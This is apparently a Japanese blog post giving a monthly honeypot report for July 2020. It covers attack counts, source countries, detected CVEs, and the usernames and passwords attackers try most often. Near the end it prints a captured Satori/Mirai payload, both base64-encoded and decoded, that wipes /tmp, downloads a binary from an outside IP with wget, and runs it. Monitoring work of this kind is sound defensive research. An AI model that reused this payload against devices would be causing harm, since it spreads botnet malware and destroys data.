ハニーポット運用(月次報告:2020年7月)
8月に入った。本来はオリンピック期間である。
8/1に関東も梅雨明けされた。このぐらいの涼しさであればオリンピックも快適に開催できたかもしれない。
T-Potにて1か月運用した結果を記載する。
今月のChangelog
7月は無し。
前提条件
運用日時:2020年7月6日-2020年7月31日
運用期間:25日
結果
①各ハニーポットで検知したAttack件数
- T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No | ハニーポット | 件数 | 先々月比 |
---|---|---|---|
1 | Dionaea | 3,794,107 | ▲864,338 |
2 | Cowrie | 3,041,517 | △19,037 |
3 | Heralding | 441,903 | ▲943,753 |
4 | Honeytrap | 389,790 | ▲213,499 |
5 | Rdpy | 67,316 | ▲1,106 |
6 | Mailoney | 12,896 | ▲22,380 |
7 | Tanner | 5,003 | ▲47 |
8 | Adbhoney | 3,585 | △1,159 |
9 | Ciscoasa | 2,209 | ▲219 |
10 | Medpot | 1,509 | △535 |
11 | ElasticPot | 913 | ▲313 |
12 | CitrixHoneypot | 573 | - |
13 | ConPot | 222 | ▲151 |
- Result
- 先月より観測期間は減少しているがCowrieへの攻撃件数は増加していた。
②攻撃元の国名と件数(Top 20)
- 各ハニーポットへの攻撃元の国名の総件数を以下に記載する。
No | 攻撃元の国名 | 件数 | 先月順位 |
---|---|---|---|
1 | Ireland | 1,029,249 | 4(↑) |
2 | Russia | 714,993 | 1(↓) |
3 | Vietnam | 666,454 | 3(→) |
4 | China | 636,493 | 2(↓) |
5 | Netherlands | 535,002 | 圏外(↑) |
6 | India | 302,099 | 7(↑) |
7 | Panama | 294,041 | 13(↑) |
8 | United States | 259,770 | 5(↓) |
9 | Brazil | 246,462 | 8(↓) |
10 | Ukraine | 227,893 | 16(↑) |
11 | Indonesia | 227,659 | 9(↓) |
12 | Germany | 205,315 | 圏外(↑) |
13 | France | 175,639 | 14(↑) |
14 | Venezuela | 167,362 | 11(↓) |
15 | Republic of Moldova | 161,765 | 6(↓) |
16 | Taiwan | 144,357 | 17(↑) |
17 | Turkey | 143,415 | 15(↓) |
18 | Japan | 117,070 | 12(↓) |
19 | Thailand | 93,604 | 20(↓) |
20 | Pakistan | 86,479 | 圏外(↑) |
③検知したCVEの脆弱性と件数
- Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No | CVE ID | CNT |
---|---|---|
1 | CVE-2020-11899 | 44,678 |
2 | CVE-2020-11910 | 161 |
3 | CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 | 32 |
4 | CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 | 26 |
5 | CVE-2020-8515 CVE-2020-8515 | 14 |
- Result
- Ripple20の攻撃が今月も多かった。世界的に対策が進むまでは数か月はこの状態が続くと予想される。
- 新規の攻撃は無し。
④よく攻撃されるユーザ名
- ユーザ名でよく攻撃されるキーワード(Top 20)で記載する。
No | ユーザ名 | 件数 |
---|---|---|
1 | root | 157,648 |
2 | admin | 75,347 |
3 | user | 21,645 |
4 | support | 16,588 |
5 | sa | 11,309 |
6 | nproc | 4,773 |
7 | test | 2,449 |
8 | postgres | 1,781 |
9 | 22 | 1,453 |
10 | ubuntu | 1,291 |
11 | sh | 1,075 |
12 | enable | 1,010 |
13 | oracle | 875 |
14 | git | 849 |
15 | www | 835 |
16 | ftpuser | 733 |
17 | guest | 635 |
18 | deploy | 524 |
19 | mysql | 490 |
20 | nagios | 438 |
- Result
- 先月から変更なし
⑤よく攻撃されるパスワード
- パスワードでよく攻撃されるキーワード(Top 20)を以下に記載する。
No | パスワード | 件数 |
---|---|---|
1 | admin | 166,216 |
2 | & | 20,401 |
3 | user | 20,056 |
4 | support | 16,368 |
5 | 123456 | 16,042 |
6 | password | 5,459 |
7 | 123 | 4,916 |
8 | nproc | 4,773 |
9 | 12345678 | 3,016 |
10 | 12345 | 2,501 |
11 | 1234 | 2,339 |
12 | 1,997 | |
13 | 1 | 1,218 |
14 | system | 1,096 |
15 | shell | 1,078 |
16 | Password | 1,011 |
17 | 123123 | 931 |
18 | 1q2w3e4r | 856 |
19 | qwerty | 820 |
20 | test | 815 |
- Result
- 先月から変更なし
最後に
- 相変わらずmirai botnetの攻撃は続いている。
◆payload: R0VUIC9zaGVsbD9jZCsvdG1wO3JtKy1yZisqO3dnZXQrOTUuMjEzLjE2NS40My9iaW5zL1VuSEFuYUFXLmFybTc7IGNobW9kKzc3NytVbkhBbmFBVy5hcm03OyAuL1VuSEFuYUFXLmFybTcrU2Nvb3QuSi5TUiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogSGVsbG8sIHdvcmxkDQpIb3N0OiA5NS4yMTMuMTY1LjQzOjgwDQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL3dlYnAsKi8qO3E9MC44DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=
base64デコードすると以下になる。
GET /shell?cd+/tmp;rm+-rf+*;wget+95.213.165.43/bins/UnHAnaAW.arm7; chmod+777+UnHAnaAW.arm7; ./UnHAnaAW.arm7+Scoot.J.SR HTTP/1.1 User-Agent: Hello, world Host: 95.213.165.43:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive
攻撃はLas Vegas
からであり、Satoriの攻撃であった。
(※上記は一例であり、同様の攻撃は他の国からも受けている。)
http.http_user_agent
がHello, world
となっており、分かりやすい。
同様のアクセスを他にも確認した。
input : /bin/busybox SATORI ip_rep : known attacker message : CMD: /bin/busybox SATORI
気になったのが日本の神戸周辺のinfowebドメイン
の端末からSatoriのアクセスがあったこと。
2020年06月23日(火)にinfowebドメインのメールアドレスは終了したと説明されていたが、
Satoriに感染してbotに参加している端末が一部残っているのかもしれない。
参考URL
お知らせ詳細「infowebドメインのメールアドレス終了のお知らせと設定変更について(2020年6月23日 終了しました)」|@niftyメール